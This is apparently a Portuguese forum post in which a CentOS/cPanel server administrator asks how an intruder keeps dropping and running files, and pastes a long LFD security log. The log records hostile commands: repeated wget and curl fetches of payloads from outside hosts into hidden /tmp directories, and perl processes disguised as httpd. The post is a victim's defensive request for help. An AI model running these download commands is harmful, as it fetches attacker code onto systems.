Denuncie   Favoritos   Indicar  

Servidor sendo invadido e não consigo descobrir como

1. Servidor sendo invadido e não consigo descobrir como

Patrick
patricknn
(usa Outra)

Enviado em 30/03/2015 - 11:53h

PEssoal, tenho um servidor em CENTOS 6 + Cpanel e o mesmo está sendo invadido de alguma forma por uma pessoa que se encontra na Alemanha

O mesmo copia alguns arquivos pra dentro do servidor, os executa e deleta

Já tentei muita coisa pra buscar e não consigo encontrar como ele consegue copiar esses arquivos.

Puxei um log do LFD e encontro isso

Mar 29 03:37:10 server lfd[13483]: *Suspicious Process* PID:29230 PPID:13353 User:centrode Uptime:1029 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 03:43:13 server lfd[20980]: *Suspicious Process* PID:22300 PPID:16728 User:nobody Uptime:107 secs EXE:/usr/local/bin/php CMD:php wn.php 80.153.236.231
Mar 29 03:52:11 server lfd[18103]: *Suspicious Process* PID:506 PPID:13353 User:cavvesc Uptime:168 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 04:00:12 server lfd[29566]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:358981 secs EXE:/usr/bin/perl CMD:[bash]
Mar 29 04:01:10 server lfd[14656]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1027440 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 29 04:05:11 server lfd[19777]: *Suspicious File* /tmp/.ppma [nobody:nobody (99:99)] - Suspicious directory
Mar 29 04:05:12 server lfd[19777]: *Suspicious File* /tmp/.ppma/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 04:05:12 server lfd[19777]: *Suspicious File* /tmp/.ppma/vuln [nobody:nobody (99:99)] - Linux Binary
Mar 29 04:05:14 server lfd[19778]: *Suspicious Process* PID:23726 PPID:3660 User:nobody Uptime:98 secs EXE:/usr/bin/curl CMD:curl -O http://remarcable.net/images/a/xgm.txt
Mar 29 04:08:13 server lfd[7008]: *Suspicious Process* PID:3727 PPID:3124 User:bppromo Uptime:122 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 04:10:11 server lfd[9845]: *Suspicious File* /tmp/.ppma/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 04:10:12 server lfd[9845]: *Suspicious File* /tmp/.ppma/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 04:10:13 server lfd[9845]: *Suspicious File* /tmp/smtx/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 04:10:14 server lfd[9845]: *Suspicious File* /tmp/smtx/try [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 04:10:14 server lfd[9845]: *Suspicious File* /tmp/smtx/wn.php [nobody:nobody (99:99)] - Script, file extension
Mar 29 04:11:15 server lfd[27443]: *Suspicious Process* PID:29078 PPID:3124 User:cavvesc Uptime:215 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 04:12:13 server lfd[12614]: *Suspicious Process* PID:22586 PPID:6243 User:nobody Uptime:76 secs EXE:/usr/bin/curl CMD:curl -O http://remarcable.net/images/a/yvj.txt
Mar 29 04:15:12 server lfd[32481]: *Suspicious File* /tmp/smtx/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 04:15:12 server lfd[32481]: *Suspicious File* /tmp/smtx/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 04:16:12 server lfd[17983]: *Suspicious Process* PID:10675 PPID:3124 User:bppromo Uptime:247 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 04:20:14 server lfd[22173]: *Suspicious Process* PID:30235 PPID:30210 User:nobody Uptime:85 secs EXE:/usr/bin/wget CMD:wget http://remarcable.net/images/a/xvp.txt
Mar 29 04:21:17 server lfd[7334]: *Suspicious Process* PID:15784 PPID:15736 User:nobody Uptime:83 secs EXE:/usr/bin/wget CMD:wget http://remarcable.net/images/a/xfc.txt
Mar 29 04:23:14 server lfd[9085]: *Suspicious Process* PID:15845 PPID:15736 User:nobody Uptime:91 secs EXE:/usr/bin/curl CMD:curl -O http://remarcable.net/images/a/xfc.txt
Mar 29 04:25:14 server lfd[11345]: *Suspicious Process* PID:18286 PPID:18189 User:nobody Uptime:88 secs EXE:/usr/bin/wget CMD:wget http://remarcable.net/images/a/xgv.txt
Mar 29 04:27:13 server lfd[13592]: *Suspicious Process* PID:23762 PPID:3124 User:centrode Uptime:1083 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 04:33:13 server lfd[19286]: *Suspicious Process* PID:32709 PPID:3124 User:cavvesc Uptime:1413 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 04:36:16 server lfd[5546]: *Suspicious Process* PID:10217 PPID:3124 User:bppromo Uptime:1781 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 04:38:15 server lfd[7394]: *Suspicious Process* PID:6332 PPID:23099 User:nobody Uptime:117 secs EXE:/usr/bin/curl CMD:curl -O http://remarcable.net/images/a/xmi.txt
Mar 29 04:42:14 server lfd[11397]: *Suspicious Process* PID:6075 PPID:3124 User:cavvesc Uptime:1491 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 04:57:16 server lfd[3183]: *Suspicious Process* PID:14988 PPID:3124 User:bppromo Uptime:199 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 05:00:16 server lfd[17949]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:362585 secs EXE:/usr/bin/perl CMD:[bash]
Mar 29 05:01:17 server lfd[998]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1031045 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 29 05:01:18 server lfd[998]: *Suspicious Process* PID:5233 PPID:5175 User:nobody Uptime:108 secs EXE:/usr/bin/wget CMD:wget http://remarcable.net/images/a/xwm.txt
Mar 29 05:04:17 server lfd[15935]: *Suspicious Process* PID:16951 PPID:16664 User:nobody Uptime:120 secs EXE:/usr/bin/wget CMD:wget http://remarcable.net/images/a/xmf.txt
Mar 29 05:05:15 server lfd[31382]: *Suspicious File* /tmp/.ppma [nobody:nobody (99:99)] - Suspicious directory
Mar 29 05:05:16 server lfd[31382]: *Suspicious File* /tmp/.ppma/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 05:05:17 server lfd[31382]: *Suspicious File* /tmp/.ppma/vuln [nobody:nobody (99:99)] - Linux Binary
Mar 29 05:10:15 server lfd[12931]: *Suspicious File* /tmp/.ppma/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 05:10:15 server lfd[12931]: *Suspicious File* /tmp/.ppma/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 05:10:16 server lfd[12931]: *Suspicious File* /tmp/smtx/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 05:10:16 server lfd[12931]: *Suspicious File* /tmp/smtx/try [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 05:10:17 server lfd[12931]: *Suspicious File* /tmp/smtx/wn.php [nobody:nobody (99:99)] - Script, file extension
Mar 29 05:14:16 server lfd[11711]: *Suspicious Process* PID:2053 PPID:3124 User:bppromo Uptime:1025 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 05:15:15 server lfd[27544]: *Suspicious File* /tmp/smtx/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 05:15:16 server lfd[27544]: *Suspicious File* /tmp/smtx/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 05:15:17 server lfd[27545]: *Suspicious Process* PID:2750 PPID:3124 User:bppromo Uptime:1082 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 05:16:16 server lfd[11804]: *Suspicious Process* PID:20047 PPID:20030 User:nobody Uptime:87 secs EXE:/usr/bin/wget CMD:wget http://remarcable.net/images/a/yyd.txt
Mar 29 05:16:17 server lfd[11804]: *Suspicious Process* PID:25917 PPID:3124 User:bppromo Uptime:311 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 05:21:18 server lfd[28903]: *Suspicious Process* PID:9035 PPID:20030 User:nobody Uptime:72 secs EXE:/usr/bin/curl CMD:curl -O http://remarcable.net/images/a/yyd.txt
Mar 29 05:24:15 server lfd[12936]: *Suspicious Process* PID:1019 PPID:3124 User:bppromo Uptime:1750 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 05:37:22 server lfd[29574]: *Suspicious Process* PID:31228 PPID:31213 User:nobody Uptime:114 secs EXE:/usr/bin/wget CMD:wget http://remarcable.net/images/a/yvo.txt
Mar 29 05:40:19 server lfd[13455]: *Suspicious Process* PID:22477 PPID:22448 User:nobody Uptime:86 secs EXE:/usr/bin/wget CMD:wget http://remarcable.net/images/a/xvm.txt
Mar 29 06:00:23 server lfd[3206]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:366191 secs EXE:/usr/bin/perl CMD:[bash]
Mar 29 06:01:20 server lfd[17842]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1034650 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 29 06:05:20 server lfd[13907]: *Suspicious File* /tmp/.ppma [nobody:nobody (99:99)] - Suspicious directory
Mar 29 06:05:21 server lfd[13907]: *Suspicious File* /tmp/.ppma/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 06:05:22 server lfd[13907]: *Suspicious File* /tmp/.ppma/vuln [nobody:nobody (99:99)] - Linux Binary
Mar 29 06:10:21 server lfd[24421]: *Suspicious File* /tmp/.ppma/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 06:10:21 server lfd[24421]: *Suspicious File* /tmp/.ppma/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 06:10:22 server lfd[24421]: *Suspicious File* /tmp/smtx/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 06:10:24 server lfd[24421]: *Suspicious File* /tmp/smtx/try [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 06:10:25 server lfd[24421]: *Suspicious File* /tmp/smtx/wn.php [nobody:nobody (99:99)] - Script, file extension
Mar 29 06:15:21 server lfd[2952]: *Suspicious File* /tmp/smtx/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 06:15:21 server lfd[2952]: *Suspicious File* /tmp/smtx/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 06:23:21 server lfd[25702]: *Suspicious Process* PID:6368 PPID:6306 User:nobody Uptime:79 secs EXE:/usr/bin/wget CMD:wget http://remarcable.net/images/a/ydz.txt
Mar 29 06:38:24 server lfd[24945]: *Suspicious Process* PID:7554 PPID:10423 User:cavvesc Uptime:203 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 06:40:21 server lfd[22443]: *Suspicious Process* PID:913 PPID:804 User:nobody Uptime:86 secs EXE:/usr/bin/wget CMD:wget http://remarcable.net/images/a/yhk.txt
Mar 29 06:46:28 server lfd[18057]: *Suspicious Process* PID:23725 PPID:23613 User:nobody Uptime:104 secs EXE:/usr/bin/wget CMD:wget http://remarcable.net/images/a/xef.txt
Mar 29 06:47:23 server lfd[951]: *Suspicious Process* PID:3366 PPID:10423 User:bppromo Uptime:1532 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 06:49:24 server lfd[32066]: *Suspicious Process* PID:6291 PPID:18484 User:nobody Uptime:101 secs EXE:/usr/bin/curl CMD:curl -O http://remarcable.net/images/a/yuo.txt
Mar 29 07:00:25 server lfd[2352]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:369793 secs EXE:/usr/bin/perl CMD:[bash]
Mar 29 07:01:23 server lfd[17339]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1038252 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 29 07:05:22 server lfd[12066]: *Suspicious File* /tmp/.ppma [nobody:nobody (99:99)] - Suspicious directory
Mar 29 07:05:23 server lfd[12066]: *Suspicious File* /tmp/.ppma/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 07:05:23 server lfd[12066]: *Suspicious File* /tmp/.ppma/vuln [nobody:nobody (99:99)] - Linux Binary
Mar 29 07:08:24 server lfd[24880]: *Suspicious Process* PID:6215 PPID:32591 User:nobody Uptime:75 secs EXE:/usr/bin/curl CMD:curl -O http://remarcable.net/images/a/yaj.txt
Mar 29 07:10:23 server lfd[22719]: *Suspicious File* /tmp/.ppma/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 07:10:23 server lfd[22719]: *Suspicious File* /tmp/.ppma/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 07:15:24 server lfd[31424]: *Suspicious File* /tmp/smtx/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 07:15:26 server lfd[31424]: *Suspicious File* /tmp/smtx/try [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 07:15:27 server lfd[31424]: *Suspicious File* /tmp/smtx/wn.php [nobody:nobody (99:99)] - Script, file extension
Mar 29 07:15:28 server lfd[31424]: *Suspicious File* /tmp/smtx/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 07:15:29 server lfd[31424]: *Suspicious File* /tmp/smtx/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 07:18:28 server lfd[10806]: *Suspicious Process* PID:24121 PPID:10423 User:bppromo Uptime:339 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 07:24:26 server lfd[2778]: *Suspicious Process* PID:19287 PPID:19245 User:nobody Uptime:63 secs EXE:/usr/bin/wget CMD:wget http://remarcable.net/images/a/xwb.txt
Mar 29 07:31:31 server lfd[8998]: *Suspicious Process* PID:28303 PPID:10423 User:cavvesc Uptime:973 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 08:00:36 server lfd[4804]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:373397 secs EXE:/usr/bin/perl CMD:[bash]
Mar 29 08:01:28 server lfd[18721]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1041857 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 29 08:04:28 server lfd[28368]: *Suspicious Process* PID:5963 PPID:5878 User:nobody Uptime:98 secs EXE:/usr/bin/wget CMD:wget http://remarcable.net/images/a/yox.txt
Mar 29 08:05:27 server lfd[9800]: *Suspicious File* /tmp/.ppma [nobody:nobody (99:99)] - Suspicious directory
Mar 29 08:05:27 server lfd[9800]: *Suspicious File* /tmp/.ppma/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 08:05:27 server lfd[9800]: *Suspicious File* /tmp/.ppma/vuln [nobody:nobody (99:99)] - Linux Binary
Mar 29 08:10:28 server lfd[16626]: *Suspicious File* /tmp/.ppma/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 08:10:28 server lfd[16626]: *Suspicious File* /tmp/.ppma/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 08:10:30 server lfd[16629]: *Suspicious Process* PID:6663 PPID:10423 User:bppromo Uptime:741 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 08:13:28 server lfd[25743]: *Suspicious Process* PID:6682 PPID:10423 User:bppromo Uptime:920 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 08:15:29 server lfd[21360]: *Suspicious File* /tmp/smtx/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 08:15:30 server lfd[21360]: *Suspicious File* /tmp/smtx/try [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 08:15:31 server lfd[21360]: *Suspicious File* /tmp/smtx/wn.php [nobody:nobody (99:99)] - Script, file extension
Mar 29 08:20:29 server lfd[26069]: *Suspicious File* /tmp/smtx/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 08:20:29 server lfd[26069]: *Suspicious File* /tmp/smtx/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 08:26:29 server lfd[12171]: *Suspicious Process* PID:8391 PPID:2533 User:bppromo Uptime:573 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 08:31:33 server lfd[15616]: *Suspicious Process* PID:11144 PPID:2533 User:cavvesc Uptime:861 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 08:58:35 server lfd[25465]: *Suspicious Process* PID:11336 PPID:2533 User:cavvesc Uptime:1076 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 09:01:37 server lfd[32341]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1045465 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 29 09:01:41 server lfd[32341]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:377065 secs EXE:/usr/bin/perl CMD:[bash]
Mar 29 09:04:46 server lfd[6248]: *Suspicious Process* PID:15335 PPID:14856 User:nobody Uptime:109 secs EXE:/usr/bin/wget CMD:wget http://109.228.25.87/.ips/xkm
Mar 29 09:05:35 server lfd[19381]: *Suspicious File* /tmp/.ppma [nobody:nobody (99:99)] - Suspicious directory
Mar 29 09:05:35 server lfd[19381]: *Suspicious File* /tmp/.ppma/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 09:05:37 server lfd[19381]: *Suspicious File* /tmp/.ppma/vuln [nobody:nobody (99:99)] - Linux Binary
Mar 29 09:05:50 server lfd[19382]: *Suspicious Process* PID:28945 PPID:26565 User:nobody Uptime:103 secs EXE:/usr/bin/curl CMD:curl -O http://remarcable.net/images/a/xjy.txt
Mar 29 09:06:38 server lfd[32638]: *Suspicious Process* PID:10096 PPID:28123 User:nobody Uptime:101 secs EXE:/usr/bin/curl CMD:curl -O http://remarcable.net/images/a/yjk.txt
Mar 29 09:06:45 server lfd[32638]: *Suspicious Process* PID:17017 PPID:14856 User:nobody Uptime:71 secs EXE:/usr/bin/curl CMD:curl -O http://109.228.25.87/.ips/xkm
Mar 29 09:10:35 server lfd[18941]: *Suspicious File* /tmp/.ppma/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 09:10:36 server lfd[18941]: *Suspicious File* /tmp/.ppma/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 09:15:36 server lfd[19949]: *Suspicious File* /tmp/smtx/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 09:15:37 server lfd[19949]: *Suspicious File* /tmp/smtx/try [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 09:15:38 server lfd[19949]: *Suspicious File* /tmp/smtx/wn.php [nobody:nobody (99:99)] - Script, file extension
Mar 29 09:20:36 server lfd[20286]: *Suspicious File* /tmp/smtx/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 09:20:36 server lfd[20286]: *Suspicious File* /tmp/smtx/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 09:26:41 server lfd[32028]: *Suspicious Process* PID:9172 PPID:8957 User:bppromo Uptime:1306 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 09:31:38 server lfd[31329]: *Suspicious Process* PID:7086 PPID:3403 User:nobody Uptime:112 secs EXE:/usr/bin/curl CMD:curl -O http://remarcable.net/images/a/xdz.txt
Mar 29 09:37:41 server lfd[12650]: *Suspicious Process* PID:5845 PPID:8957 User:cavvesc Uptime:935 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 09:46:41 server lfd[31505]: *Suspicious Process* PID:11881 PPID:11843 User:nobody Uptime:92 secs EXE:/usr/bin/wget CMD:wget http://remarcable.net/images/a/xsm.txt
Mar 29 10:01:40 server lfd[29015]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1049069 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 29 10:02:49 server lfd[9309]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:380730 secs EXE:/usr/bin/perl CMD:[bash]
Mar 29 10:05:40 server lfd[14639]: *Suspicious File* /tmp/.ppma [nobody:nobody (99:99)] - Suspicious directory
Mar 29 10:05:41 server lfd[14639]: *Suspicious File* /tmp/.ppma/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 10:05:42 server lfd[14639]: *Suspicious File* /tmp/.ppma/vuln [nobody:nobody (99:99)] - Linux Binary
Mar 29 10:10:39 server lfd[11772]: *Suspicious File* /tmp/.ppma/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 10:10:40 server lfd[11772]: *Suspicious File* /tmp/.ppma/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 10:15:40 server lfd[9048]: *Suspicious File* /tmp/smtx/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 10:15:41 server lfd[9048]: *Suspicious File* /tmp/smtx/try [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 10:15:41 server lfd[9048]: *Suspicious File* /tmp/smtx/wn.php [nobody:nobody (99:99)] - Script, file extension
Mar 29 10:15:55 server lfd[9051]: *Suspicious Process* PID:27742 PPID:24669 User:nobody Uptime:66 secs EXE:/usr/bin/curl CMD:curl -O http://remarcable.net/images/a/yat.txt
Mar 29 10:18:40 server lfd[14325]: *Suspicious Process* PID:5200 PPID:8957 User:bppromo Uptime:512 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 10:20:40 server lfd[6355]: *Suspicious File* /tmp/smtx/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 10:20:41 server lfd[6355]: *Suspicious File* /tmp/smtx/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 11:01:51 server lfd[12895]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1052672 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 29 11:04:01 server lfd[2528]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:384392 secs EXE:/usr/bin/perl CMD:[bash]
Mar 29 11:05:42 server lfd[24162]: *Suspicious File* /tmp/.ppma [nobody:nobody (99:99)] - Suspicious directory
Mar 29 11:05:43 server lfd[24162]: *Suspicious File* /tmp/.ppma/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 11:10:42 server lfd[16455]: *Suspicious File* /tmp/.ppma/vuln [nobody:nobody (99:99)] - Linux Binary
Mar 29 11:10:43 server lfd[16455]: *Suspicious File* /tmp/.ppma/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 11:10:44 server lfd[16455]: *Suspicious File* /tmp/.ppma/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 11:15:44 server lfd[9904]: *Suspicious File* /tmp/smtx/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 11:15:45 server lfd[9904]: *Suspicious File* /tmp/smtx/try [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 11:15:46 server lfd[9904]: *Suspicious File* /tmp/smtx/wn.php [nobody:nobody (99:99)] - Script, file extension
Mar 29 11:19:47 server lfd[24321]: *Suspicious Process* PID:4466 PPID:8957 User:centrode Uptime:954 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 11:20:44 server lfd[3726]: *Suspicious File* /tmp/smtx/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 11:20:46 server lfd[3726]: *Suspicious File* /tmp/smtx/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 11:21:46 server lfd[14647]: *Suspicious Process* PID:8425 PPID:8957 User:bppromo Uptime:1052 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 11:22:50 server lfd[25967]: *Suspicious Process* PID:9223 PPID:9036 User:nobody Uptime:93 secs EXE:/usr/bin/wget CMD:wget http://remarcable.net/images/a/yee.txt
Mar 29 11:34:57 server lfd[31890]: *Suspicious Process* PID:17411 PPID:15638 User:nobody Uptime:81 secs EXE:/usr/bin/curl CMD:curl -O http://remarcable.net/images/a/ypj.txt
Mar 29 11:47:51 server lfd[14768]: *Suspicious Process* PID:2829 PPID:2462 User:nobody Uptime:65 secs EXE:/usr/bin/wget CMD:wget http://remarcable.net/images/a/xet.txt
Mar 29 12:02:48 server lfd[11674]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1056336 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 29 12:03:48 server lfd[22110]: *Suspicious Process* PID:2518 PPID:2476 User:nobody Uptime:114 secs EXE:/usr/bin/wget CMD:wget http://remarcable.net/images/a/yqc.txt
Mar 29 12:04:50 server lfd[32531]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:388058 secs EXE:/usr/bin/perl CMD:[bash]
Mar 29 12:05:47 server lfd[11759]: *Suspicious File* /tmp/.ppma [nobody:nobody (99:99)] - Suspicious directory
Mar 29 12:05:49 server lfd[11759]: *Suspicious File* /tmp/.ppma/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 12:07:59 server lfd[961]: *Suspicious Process* PID:18649 PPID:17785 User:nobody Uptime:79 secs EXE:/usr/bin/curl CMD:curl -O http://remarcable.net/images/a/xdq.txt
Mar 29 12:10:47 server lfd[1365]: *Suspicious File* /tmp/.ppma/vuln [nobody:nobody (99:99)] - Linux Binary
Mar 29 12:10:49 server lfd[1365]: *Suspicious File* /tmp/.ppma/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 12:10:49 server lfd[1365]: *Suspicious File* /tmp/.ppma/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 12:15:47 server lfd[21748]: *Suspicious File* /tmp/smtx/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 12:15:48 server lfd[21748]: *Suspicious File* /tmp/smtx/try [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 12:15:48 server lfd[21748]: *Suspicious File* /tmp/smtx/wn.php [nobody:nobody (99:99)] - Script, file extension
Mar 29 12:20:47 server lfd[9285]: *Suspicious File* /tmp/smtx/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 12:20:48 server lfd[9285]: *Suspicious File* /tmp/smtx/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 12:43:31 server lfd[11239]: *Suspicious Process* PID:30464 PPID:29381 User:nobody Uptime:73 secs EXE:/usr/bin/curl CMD:curl -O http://remarcable.net/images/a/xad.txt
Mar 29 12:46:49 server lfd[19783]: *Suspicious Process* PID:1541 PPID:8957 User:cavvesc Uptime:669 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 13:02:55 server lfd[17222]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1059940 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 29 13:05:44 server lfd[3632]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:391662 secs EXE:/usr/bin/perl CMD:[bash]
Mar 29 13:05:50 server lfd[13108]: *Suspicious File* /tmp/.ppma [nobody:nobody (99:99)] - Suspicious directory
Mar 29 13:10:50 server lfd[28792]: *Suspicious File* /tmp/.ppma/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 13:10:52 server lfd[28792]: *Suspicious File* /tmp/.ppma/vuln [nobody:nobody (99:99)] - Linux Binary
Mar 29 13:10:55 server lfd[28792]: *Suspicious File* /tmp/.ppma/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 13:15:50 server lfd[12534]: *Suspicious File* /tmp/.ppma/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 13:15:52 server lfd[12534]: *Suspicious File* /tmp/smtx/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 13:15:54 server lfd[12534]: *Suspicious File* /tmp/smtx/try [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 13:15:55 server lfd[12534]: *Suspicious File* /tmp/smtx/wn.php [nobody:nobody (99:99)] - Script, file extension
Mar 29 13:20:50 server lfd[28203]: *Suspicious File* /tmp/smtx/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 13:20:52 server lfd[28203]: *Suspicious File* /tmp/smtx/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 14:04:12 server lfd[2525]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1063603 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 29 14:08:46 server lfd[5932]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:395443 secs EXE:/usr/bin/perl CMD:[bash]
Mar 29 14:10:54 server lfd[30977]: *Suspicious File* /tmp/.ppma [nobody:nobody (99:99)] - Suspicious directory
Mar 29 14:10:55 server lfd[30977]: *Suspicious File* /tmp/.ppma/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 14:15:53 server lfd[10371]: *Suspicious File* /tmp/.ppma/vuln [nobody:nobody (99:99)] - Linux Binary
Mar 29 14:15:54 server lfd[10371]: *Suspicious File* /tmp/.ppma/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 14:15:56 server lfd[10371]: *Suspicious File* /tmp/.ppma/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 14:20:54 server lfd[20531]: *Suspicious File* /tmp/smtx/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 14:20:55 server lfd[20531]: *Suspicious File* /tmp/smtx/try [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 14:20:57 server lfd[20531]: *Suspicious File* /tmp/smtx/wn.php [nobody:nobody (99:99)] - Script, file extension
Mar 29 14:20:59 server lfd[20531]: *Suspicious File* /tmp/smtx/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 14:25:54 server lfd[30662]: *Suspicious File* /tmp/smtx/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 14:51:50 server lfd[5343]: *Suspicious Process* PID:17578 PPID:15821 User:nobody Uptime:139 secs EXE:/usr/bin/curl CMD:curl -O http://remarcable.net/images/a/xgn.txt
